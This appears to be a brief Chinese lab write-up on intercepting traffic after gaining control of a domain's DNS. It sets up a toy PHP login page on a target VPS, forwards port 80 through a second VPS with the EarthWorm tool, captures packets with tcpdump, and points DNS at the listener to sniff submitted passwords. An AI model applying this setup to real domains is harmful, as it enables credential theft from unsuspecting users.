拿到域名解析权限后

由于自己的域名…出了点问题，就先将就的测试一下
实验环境：
两台vps，一台用于需要攻击的靶机，一台用于中间监听

1、靶机上的登陆页面：

<?php
error_reporting(E_ALL);
if(isset($_POST['p'])){
if($_POST['p'] == "lemon"){
    echo "login ok";
}else{
    echo "login error";
}
}
?>

<form action="" method="post">
    <input type="text" name="p" value="">
    <input type="submit" value="login">
</form>

2、中间监听的vps
现在在中间端口转发一下
./ew_for_linux64 -s lcx_tran -l 80 -f 靶机ip -g 80

然后抓取一下流量
tcpdump tcp -i eth1 -t -s 0 -w ./test.cap

最后的是将域名解析改到这个监听的vps上